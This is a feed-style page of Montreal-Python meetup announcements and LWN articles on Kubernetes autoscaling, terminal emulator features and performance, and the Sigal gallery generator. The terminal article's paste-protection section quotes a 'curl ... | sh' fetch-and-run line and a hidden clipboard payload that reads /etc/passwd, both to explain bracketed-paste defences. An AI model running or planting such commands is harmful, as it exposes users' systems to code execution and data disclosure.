We are looking for lightning talks (5min) submissions for our next event. Send your proposals at team@montrealpython.org

When

June 11th, 2018 6PM to 9PM

Where

To be determined

Categories: External Blogs

Autoscaling for Kubernetes workloads

Anarcat - Sun, 05/13/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

Technologies like containers, clusters, and Kubernetes offer the prospect of rapidly scaling the available computing resources to match variable demands placed on the system. Actually implementing that scaling can be a challenge, though. During KubeCon + CloudNativeCon Europe 2018, Frederic Branczyk from CoreOS (now part of Red Hat) held a packed session to introduce a standard and officially recommended way to scale workloads automatically in Kubernetes clusters.

Kubernetes has had an autoscaler since the early days, but only recently did the community implement a more flexible and extensible mechanism to make decisions on when to add more resources to fulfill workload requirements. The new API integrates not only the Prometheus project, which is popular in Kubernetes deployments, but also any arbitrary monitoring system that implements the standardized APIs.

The old and new autoscalers

Branczyk first covered the history of the autoscaler architecture and how it has evolved through time. Kubernetes, since version 1.2, features a horizontal pod autoscaler (HPA), which dynamically allocates resources depending on the detected workload. When the load becomes too high, the HPA increases the number of pod replicas and, when the load goes down again, it removes superfluous copies. In the old HPA, a component called Heapster would pull usage metrics from the internal cAdvisor monitoring daemon and the HPA controller would then scale workloads up or down based on those metrics.

Unfortunately, the controller would only make decisions based on CPU utilization, even though Heapster provides other metrics like disk, memory, or network usage. According to Branczyk, while in theory any workload can be converted to a CPU-bound problem, this is an inconvenient limitation, especially when implementing higher-level service level agreements. For example, an arbitrary agreement like "process 95% of requests within 100 milliseconds" would be difficult to represent as a CPU-usage problem. Another limitation is that the Heapster API was only loosely defined and never officially adopted as part of the larger Kubernetes API. Heapster also required the help of a storage backend like InfluxDB or Google's Stackdriver to store samples, which made deploying an HPA challenging.

In late 2016, the "autoscaling special interest group" (SIG autoscaling) decided that the pipeline needed a redesign that would allow scaling based on arbitrary metrics from external monitoring systems. The result is that Kubernetes 1.6 shipped with a new API specification defining how the autoscaler integrates with those systems. Having learned from the Heapster experience, the developers specified the new API, but did not implement it for any specific system. This shifts responsibility of maintenance to the monitoring vendors: instead of "dumping" their glue code in Heapster, vendors now have to maintain their own adapter conforming to a well-defined API to get certified.

The new specification defines core metrics like CPU, memory, and disk usage. Kubernetes provides a canonical implementation of those metrics through the metrics server, a stripped down version of Heapster. The metrics server provides the core metrics required by Kubernetes so that scheduling, autoscaling, and things like kubectl top work out of the box. This means that any Kubernetes 1.8 cluster now supports autoscaling using those metrics out of the box: for example minikube or Google's Kubernetes Engine both offer a native metrics server without an external database or monitoring system.

In terms of configuration syntax, the change is minimal. Here is an example of how to configure the autoscaler in earlier Kubernetes releases, taken from the OpenShift Container Platform documentation:

apiVersion: extensions/v1beta1 kind: HorizontalPodAutoscaler metadata: name: frontend spec: scaleRef: kind: DeploymentConfig name: frontend apiVersion: v1 subresource: scale minReplicas: 1 maxReplicas: 10 cpuUtilization: targetPercentage: 80

The new API configuration is more flexible:

apiVersion: autoscaling/v2beta1 kind: HorizontalPodAutoscaler metadata: name: hpa-resource-metrics-cpu spec: scaleTargetRef: apiVersion: apps/v1beta1 kind: ReplicationController name: hello-hpa-cpu minReplicas: 1 maxReplicas: 10 metrics: - type: Resource resource: name: cpu targetAverageUtilization: 50

Notice how the cpuUtilization field is replaced by a more flexible metrics field that targets CPU utilization, but can support other core metrics like memory usage.

The ultimate goal of the new API, however, is to support arbitrary metrics, through the custom metrics API. This behaves like the core metrics, except that Kubernetes does not ship or define a set of custom metrics directly, which is where systems like Prometheus come in. Branczyk demonstrated the k8s-prometheus-adapter, which connects any Prometheus metric to the Kubernetes HPA, allowing the autoscaler to add new pods to reduce request latency, for example. Those metrics are bound to Kubernetes objects (e.g. pod, node, etc.) but an "external metrics API" was also introduced in the last two months to allow arbitrary metrics to influence autoscaling. This could allow Kubernetes to scale up a workload to deal with a larger load on an external message broker service, for example.

Here is an example of the custom metrics API pulling metrics from Prometheus to make sure that each pod handles around 200 requests per second:

metrics: - type: Pods pods: metricName: http_requests targetAverageValue: 200

Here http_requests is a metric exposed by the Prometheus server which looks at how many requests each pod is processing. To avoid putting too much load on each pod, the HPA will then ensure that this number will be around a target value by spawning or killing pods as appropriate.

Upcoming features

The SIG seem to have rounded up everything quite neatly. The next step is to deprecate Heapster: as of 1.10, all critical parts of Kubernetes use the new API so a discussion is under way in another group (SIG instrumentation) to finish moving away from the older design.

Another thing the community is looking into is vertical scaling. Horizontal scaling is fine for certain workloads, like caching servers or application frontends, but database servers, most notably, are harder to scale by just adding more replicas; in this case what an autoscaler should do is increase the size of the replicas instead of their numbers. Kubernetes supports this through the vertical pod autoscaler (VPA). It is less practical than the HPA because there is a physical limit to the size of individual servers that the autoscaler cannot exceed, while the HPA can scale up as long as you add new servers. According to Branczyk, the VPA is also more "complicated and fragile, so a lot more thought needs to go into that." As a result, the VPA is currently in alpha. It is not fully compatible with the HPA and is relevant only in cases where the HPA cannot do the job: for example, workloads where there is only a single pod or a fixed number of pods like StatefulSets.

Branczyk gave a set of predictions for other improvements that could come down the pipeline. One issue he identified is that, while the HPA and VPA can scale pods, there is a different Cluster Autoscaler (CA) that manages nodes, which are the actual machines running the pods. The CA allows a cluster to move pods between the nodes to remove underutilized nodes or create new nodes to respond to demand. It's similar to the HPA, except the HPA cannot provision new hardware resources like physical machines on its own: it only creates new pods on existing nodes. The idea here is to combine to two projects into a single one to keep a uniform interface for what is really the same functionality: scaling a workload by giving it more resources.

Another hope is that OpenMetrics will emerge as a standard for metrics across vendors. This process seems to be well under way with Kubernetes already using the Prometheus library, which serves as a basis for the standard, and with commercial vendors like Datadog supporting the Prometheus API as well. Another area of possible standardization is the gRPC protocol used in some Kubernetes clusters to communicate between microservices. Those endpoints can now expose metrics through "interceptors" that get executed before the request is passed to the application. One of those interceptors is the go-grpc-prometheus adapter, which enables Prometheus to scrape metrics from any gRPC-enabled service. The ultimate goal is to have standard metrics deployed across an entire cluster, allowing the creation of reusable dashboards, alerts, and autoscaling mechanisms in a uniform system.

Conclusion

This session was one of the most popular of the conference, which shows a deep interest in this key feature of Kubernetes deployments. It was great to see Branczyk, who is involved with the Prometheus project as well, work on standardization so other systems can work with Kubernetes.

The speed at which APIs change is impressive; in only a few months, the community upended a fundamental component of Kubernetes and replaced it with a new API that users will need to become familiar with. Given the flexibility and clarity of the new API, it is a small cost to pay to represent business logic inside such a complex system. Any simplification will surely be welcome in the maelstrom of APIs and subsystems that Kubernetes has become.

A video of the talk and slides [PDF] are available. SIG autoscaling members Marcin Wielgus and Solly Ross presented an introduction (video) and deep dive (video) talks that might be interesting to our readers who want all the gory details about Kubernetes autoscaling.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Montréal-Python 71 - Burning Yeti

Montreal Python - Sun, 04/29/2018 - 23:00

Enjoy our May meetup just in time before PyCon US with these amazing speakers - 2 of which will be be presenting at PyCon!

Please RSVP on Meetup

Thanks to Google Montreal for sponsoring the event!

Presentations Survival analysis for conversion rates - Tristan Boudreault

What percentage of your users will spend? Typically, analysts use the conversion rate to assess how successful a website is at converting trial users into paying ones. But is this calculation giving us results that are lower than reality? With a talk rich in examples, Tristan will show how Shopify reframes the traditional conversion questions in survival analysis terms.

Data Science at Shopify - Françoise Provencher

Françoise is a data science technical lead at Shopify, a multi-channel commerce platform that has a decade-worth of data on a very diverse set of businesses. We’ll hear about how Python is particularly useful when it comes to understanding Shopify’s user base by sifting through tons of data.

This presentation will be in English.

Integrate Geocode data with Python - Jean Luc Semedo

Les applications intégrant des modules de géolocalisation sont de plus en plus demandées. Avec Python, il existe de nombreuses librairies permettant de gérer la géolocalisation de façon native et très simplement. Nous allons durant cette présentation en survoler quelques-unes : Geopy, pyproj, Mapnik, GeoDjango...

Jean Luc SEMEDO, Back-end and mobile developper en Freelance

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:30PM - End of the event
  • 9:00PM - Benelux
When

Monday, May 7th, 2018 at 6:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Categories: External Blogs

Call for speaker - Montréal-Python 71 - Burning Yeti

Montreal Python - Sun, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) at team@montrealpython.org or come join us in our Slack if you would like to discuss about it at http://slack.mtlpy.org/

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Full event info: http://montrealpython.org/en/2018/04/mp71

Categories: External Blogs

A look at terminal emulators, part 2

Anarcat - Sat, 04/14/2018 - 19:00

This article is the second in a two-part series about terminal emulators.

A comparison of the feature sets for a handful of terminal emulators was the subject of a recent article; here I follow that up by examining the performance of those terminals. This might seem like a lesser concern, but as it turns out, terminals exhibit surprisingly high latency for such fundamental programs. I also examine what is traditionally considered "speed" (but is really scroll bandwidth) and memory usage, with the understanding that the impact of memory use is less than it was when I looked at this a decade ago (in French).

Latency

After thorough research on terminal emulators performance, I have come to the conclusion that its most important aspect is latency. In his Typing with pleasure article, Pavel Fatin reviewed the latency of various text editors and hinted that terminal emulators might be slower than the fastest text editors. That is what eventually led me to run my own tests on terminal emulators and write this series.

But what is latency and why does it matter? In his article, Fatin defined latency as "a delay between the keystroke and corresponding screen update" and quoted the Handbook of Human-Computer Interaction which says: "Delay of visual feedback on a computer display have important effects on typist behavior and satisfaction."

Fatin explained that latency has more profound effects than just satisfaction: "typing becomes slower, more errors occur, eye strain increases, and muscle strain increases". In other words, latency can lead to typos but also to lesser code quality as it imposes extra cognitive load on the brain. But worse, "eye and muscle strain increase" seems to imply that latency can also lead to physical repetitive strain injuries.

Some of those effects have been known for a long time, with some results published in the Ergonomics journal in 1976 showing that a hundred-millisecond delay "significantly impairs the keying speed". More recently, the GNOME Human Interface Guidelines set the acceptable response time at ten milliseconds and, pushing this limit down even further, this video from Microsoft Research shows that the ideal target might even be as low as one millisecond.

Fatin performed his tests on editors, but he created a portable tool called Typometer that I used to test latency in terminal emulators. Keep in mind that the test is a simulation: in reality, we also need to take into account input (keyboard, USB controller, etc.) and output (graphics card and monitor buffers) latency. Those typically add up to more than 20ms in typical configurations, according to Fatin. With more specialized "gaming" hardware, the bare minimum is around three milliseconds. There is therefore little room for applications to add any latency to the pipeline. Fatin's goal is to bring that extra latency down to one millisecond or even zero-latency typing, which was released as part of IntelliJ IDEA 15. Here are my measurements, which include some text editors, showing that my results are consistent with Fatin's (all times in miliseconds):

Program mean std min 90% max uxterm 1.7 0.3 0.7 2 2.4 mlterm 1.8 0.3 0.7 2.2 2.5 Vim (Athena) 2.8 1.1 0.4 3.5 12.7 Vim (GTK2) 3.9 1.2 0.7 4.8 11.9 Emacs 4.8 2.3 0.5 5.8 32.5 gedit 8.9 3.4 2.8 12.5 14.2 Konsole 13.4 1.2 11.5 15 16.1 Alacritty 15.1 1.2 12.8 15.9 26.3 st 15.7 3.9 10.6 19.4 19.6 Vim (GTK3) 16.5 7.9 0.4 21.9 27.2 urxvt 18.3 0.3 17.3 18.7 19 pterm 23.4 0.9 21.7 24.5 25.4 GNOME Terminal 27.1 1 25.9 27.5 39.3 Xfce Terminal 27.4 0.4 26.4 27.9 28.7 Terminator 28.1 0.7 26.4 29 29.4

The first thing that struck me is that old programs like xterm and mlterm have the best response time, having worse case latency (2.4ms) better than the best case for all other terminals (10.6ms for st). No modern terminal crosses the ten milliseconds threshold. In particular, Alacritty doesn't seem to live up to his "fastest terminal emulator in existence" claims either, although results have improved since I first tested the program in July 2017. Indeed, the project seems to be aware of the situation and is working on improving the display pipeline with threads. We can also note that Vim using GTK3 is slower than its GTK2 counterpart by an order of magnitude. It might therefore be possible that the GTK3 framework introduces extra latency, as we can also observe other that GTK3-based terminals (Terminator, Xfce4 Terminal, and GNOME Terminal, for example) have higher latency.

You might not notice those differences. As Fatin explains: "one does not necessarily need to perceive latency consciously to be affected by it". Fatin also warns about standard deviation (the std column above and the width of error bars in the graph): "any irregularities in delay durations (so called jitter) pose additional problem because of their inherent unpredictability".

The graph above is from a clean Debian 9 (stretch) profile with the i3 window manager. That environment gives the best results in the latency test: as it turns out, GNOME introduces about 20ms of latency to all measurements. A possible explanation could be that there are programs running that synchronously handle input events: Fatin gives the example of Workrave, which adds latency by processing all input events synchronously. By default, GNOME also includes compositing window manager (Mutter), an extra buffering layer that adds at least eight milliseconds in Fatin's tests.

In the graph above, we can see the same tests performed on Fedora 27 with GNOME running on X.org. The change is drastic; latency at least doubled and in some cases is ten times larger. Forget the one millisecond target: all terminals go far beyond the ten milliseconds budget. The VTE family gets closer to fifty milliseconds with Terminology and GNOME Terminal having spikes well above that threshold. We can also see there's more jitter in those tests. Even with the added latency, we can see that mlterm and, to a lesser extent xterm still perform better than their closest competitors, Konsole and st.

Scrolling speed

The next test is the traditional "speed" or "bandwidth" test that measures how fast the terminal can scroll by displaying a large amount of text on the terminal at once. The mechanics of the test vary; the original test I found was simply to generate the same test string repeatedly using the seq command. Other tests include one from Thomas E. Dickey, the xterm maintainer, which dumps the terminfo.src file repeatedly. In another review of terminal performance, Dan Luu uses a base32-encoded string of random bytes that is simply dumped on the terminal with cat. Luu considers that kind of test to be "as useless a benchmark as I can think of" and suggests using the terminal's responsiveness during the test as a metric instead. Dickey also dismisses that test as misleading. Yet both authors recognize that bandwidth can be a problem: Luu discovered the Emacs Eshell hangs while showing large files and Dickey implemented an optimization to work around the perceived slowness of xterm. There is therefore still some value in this test as the rendering process varies a lot between terminals; it also serves as a good test harness for testing other parameters.

Here we can see rxvt and st are ahead of all others, closely followed by the much newer Alacritty, expressly designed for speed. Xfce (representing the VTE family) and Konsole are next, running at almost twice the time while xterm comes last, almost five times as slow as rxvt. During the test, xterm also had jitter in the display: it was difficult to see the actual text going by, even if it was always the same string. Konsole was fast, but it was cheating: the display would hang from time to time, showing a blank or partially drawn display. Other terminals generally display all lines faithfully, including st, Alacritty, and rxvt.

Dickey explains that performance variations are due to the design of scrollback buffers in the different terminals. Specifically, he blames the disparity on rxvt and other terminals "not following the same rules":

Unlike xterm, rxvt did not attempt to display all updates. If it fell behind, it would discard some of the updates, to catch up. Doing that had a greater effect on the apparent scrolling speed than its internal memory organization, since it was useful for any number of saved-lines. One drawback was that ASCII animations were somewhat erratic.

To fix this perceived slowness of xterm, Dickey introduced the fastScroll resource to allow xterm to drop some screen updates to catch up with the flow and, indeed, my tests confirm the resource improves performance to match rxvt. It is, however, a rather crude implementation as Dickey explains: "sometimes xterm — like konsole — appears to stop, since it is waiting for a new set of screen updates after having discarded some". In this case, it seems that other terminals found a better compromise between speed and display integrity.

Resource usage

Regardless of the worthiness of bandwidth as a performance metric, it does provide a way to simulate load on the terminals, which in turn allows us to measure other parameters like memory or disk usage. The metrics here were obtained by running the above seq benchmark under the supervision of a Python process that collected the results of getrusage() counters for ru_maxrss, the sum of ru_oublock and ru_inblock, and a simple timer for wall clock time.

St comes first in this benchmark with the smallest memory footprint, 8MB on average, which was no surprise considering the project's focus on simplicity. Slightly larger are mlterm, xterm, and rxvt at around 12MB. Another notable result is Alacritty, which takes a surprising amount of memory at 30MB. Next comes the VTE family members which vary between 40 and 60MB, a higher result that could be explained by those programs use of higher-level libraries like GTK. Konsole comes last with a whopping 65MB of memory usage during the tests, although that might be excused due to its large feature set.

Compared with the results I had a decade ago, all programs take up much more memory. Xterm used to take 4MB of memory, but now takes 15MB just on startup. A similar increase also affects rxvt, which now takes 16MB of memory out of the box. The Xfce Terminal now takes 34MB, a three-fold increase, yet GNOME Terminal only takes 20MB on startup. Of course, the previous tests were done on a 32-bit architecture. At LCA 2012, Rusty Russell also explained there are many more subtle reasons that could explain such an increase. Besides, maybe this is something we can live with in this modern day and age of multi-gigabyte core memory sizes.

Yet I can't help but feel there's a waste of resources for something so fundamental as a terminal. Those programs should be the smallest of the small and should be able to run in a shoe box, when those eventually run Linux (you know they will). Yet with those numbers, memory usage would be a concern only when running multiple terminals in anything but the most limited of environments. To compensate, GNOME Terminal, Konsole, urxvt, Terminator, and Xfce Terminal feature a daemon mode that manages multiple terminals through a single process which limits the impact of their larger memory footprint.

Another result I have found surprising in my tests is actual disk I/O: I did not expect any, yet some terminals write voluminous amounts of data to disk. It turns out the VTE library actually writes the scrollback buffer to disk, a "feature" that was noticed back in 2010 and that is still present in modern implementations. At least the file contents are now encrypted with AES256 GCM since 0.39.2, but this raises the question of what's so special about the VTE library that it requires such an exotic approach.

Conclusion

In the previous article, we found that VTE-based terminals have a good feature set, yet here we see that this comes with some performance costs. Memory isn't a big issue since all VTE terminals are spawned from a single daemon process that limits memory usage. Old systems tight on core memory might still need older terminals with lower memory usage, however. While VTE terminals behave well in bandwidth tests, their latency is higher than the criterion set in the GNOME Human Interface Guidelines, which is probably something that the developers of the VTE library should look into. Considering how inevitable the terminal is even for novice users in Linux, those improvements might make the experience slightly less traumatic. For seasoned geeks, changing from the default terminal might even mean quality improvements and less injuries during long work sessions. Unfortunately, only the old xterm and mlterm get us to the magic 10ms range, which might involve unacceptable compromises for some.

The latency benchmarks also show there are serious tradeoffs that came with the introduction of compositors in Linux graphical environments. Some users might want to take a look at conventional window managers, since they provide significant latency improvements. Unfortunately, it was not possible to run latency tests in Wayland: the Typometer program does exactly the kind of things Wayland was designed to prevent, namely inject keystrokes and spy on other windows. Hopefully, Wayland compositors are better than X.org at performance and someone will come up with a way of benchmarking latency in those environments in the future.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

A look at terminal emulators, part 1

Anarcat - Thu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command: git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \ Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only a Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Montréal-Python 70 - Atomic Zucchini

Montreal Python - Tue, 03/27/2018 - 23:00

It is with pleasure that we announce the presentations of our 70th meetup. Unexpected events forced us to postpone last month's meetup. But don't worry, we are back in force with a menu full of python delights!

Thanks to Shopify for sponsoring this event by providing the venue and pizza!

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 7:30PM - Break
  • 7:45PM - Presentations
  • 9:00PM - End of the event
  • 9:15PM - Benelux
Presentations SikuliX: automatise tout ce que tu vois avec 1 seul outil (Windows, Mac, Linux) - Dominik Seelos

SikuliX est un outtils d’automation qui nous permet de scripter (en python 2.7) des tâches récursives avec très très peu d’expérience en automation. SikuliX fonctionne par reconnaissance d’image et peut faire tout ce qu’un clavier souris peuvent (Windows, Mac et Linux)

Automate All The Things with Home Assistant - Philippe Gauthier Passeriez-vous une entrevue de data scientist junior? - Nicolas Coallier

Démontrer les modules et le niveau en python nécessaire pour être embaucher à titre de data scientist junior dans une entreprise. Nous avons un test interne en python que nous faisons passer lors des entrevues. Je passerai à travers le test qui contient les réponses.

Modules abordés: Pandas, Numpy, Sklearn, Beatufiulsoup, re... Théorie ML abordé: Classification, Segmentation, LSTM, Boosting Autres volets abordé: Scrapping, NLP , structure des données

When

Monday, April 9th, 2018 at 6h00PM

Where

Shopify, 490 rue de la Gauchetière Montréal, Québec

Categories: External Blogs

Montréal-Python 70 - Call for speakers - Atomic Zucchini

Montreal Python - Tue, 03/13/2018 - 23:00

The next Montréal-Python will be happening between Easter and your next sugar shack trip!

As always, we are looking for speakers!

Submit your proposals up to 30 minutes at team@montrealpython.org or come join us in our Slack if you would like to discuss about it at http://slack.mtlpy.org/

Cheers!

When

Monday, March 12th, 2018, 6:00PM-9:00PM

Where

TBD

Categories: External Blogs

Montréal-Python 70 is gonna be in April

Montreal Python - Fri, 03/09/2018 - 00:00

Hello,

Unfortunately next Monday's meetup (March 12th) need to be postponed to next month.

Please send us your talk propositions by email to: mtlpyteam@googlegroups.com

See you in April for MP70 Atomic Zuccini!

Categories: External Blogs

Easy photo galleries with Sigal

Anarcat - Tue, 03/06/2018 - 19:00

Sigal is a "simple static gallery generator" with a straightforward design, a nice feature set, and great themes. It was started as a toy project, but has nevertheless grown into a sizable and friendly community. After struggling with maintenance using half a dozen photo gallery projects along the way, I feel I have found a nice little gem that I am happy to share with LWN readers.

CMS vs. SSG

Sigal is part of a growing family of static site generators (SSG), software that generates web sites as static HTML files as opposed to more elaborate Content Management Systems (CMS) that generate HTML content on the fly. A CMS requires specialized server-side software that needs maintenance to keep up to date with security fixes. That software is always running and exposed on the network, whereas a site generated with an SSG is only a collection of never-changing files. This drastically reduces the attack surface as visitors do not (usually) interact with the software directly. Finally, web servers can deliver static content much faster than dynamic content, which means SSGs can offer better performance than a CMS.

Having contributed to a major PHP-based CMS for over a decade, I was glad to finally switch to a SSG (ikiwiki) for my own web site three years ago. My photo gallery, however, was still running on a CMS: after running the venerable Gallery software (in hibernation since 2014), then Coppermine, I ended up using Piwigo. But that required a PHP-enabled web server, which meant chasing an endless stream of security issues. While I did consider non-PHP alternatives like MediaGoblin, that seemed too complicated (requiring Celery, Paste, and PostgreSQL). Really, static site generators had me hooked and there was no turning back.

Initially, I didn't use Sigal, as I first stumbled upon PhotoFloat. It is the brainchild of Jason A. Donenfeld—the same person behind the pass password manager that we previously covered and the WireGuard virtual private network (VPN) as well. PhotoFloat is a small Python program that generates a static gallery running custom JavaScript code. I was enthusiastic about the project: I packaged it for Debian and published patches to implement RSS feeds and multiple gallery support. Unfortunately, patches from contributors would just sit on the mailing list without feedback for months which led to some users forking the project. Donenfeld was not happy with the result; he decried the new PHP dependency and claimed the fork introduced a directory traversal vulnerability. The fork now seems to be more active than the original and was renamed to MyPhotoShare. But at that point, I was already looking for alternatives and found out about Sigal when browsing a friend's photo gallery.

What is Sigal?

Sigal was created by a French software developer from Lyon, Simon Conseil. In an IRC interview, he said that he started working on Sigal as a "toy project to learn Python", as part of his work in Astrophysics data processing at the Very Large Telescope in Chile:

A few years ago, I was already working on astrophysics but with another language (IDL): proprietary, and expensive, like MATLAB. Python was getting used more widely, with the birth of Astropy. So wanting to learn Python, I started to contribute to Pelican, and had the idea to do the same for photo galleries. I was using Piwigo, and felt I didn't need the more dynamic parts (comments, stars, etc.). A static site is so much simpler with some JavaScript library to do most of the job. Add some glue to create the pages, and Sigal was born!

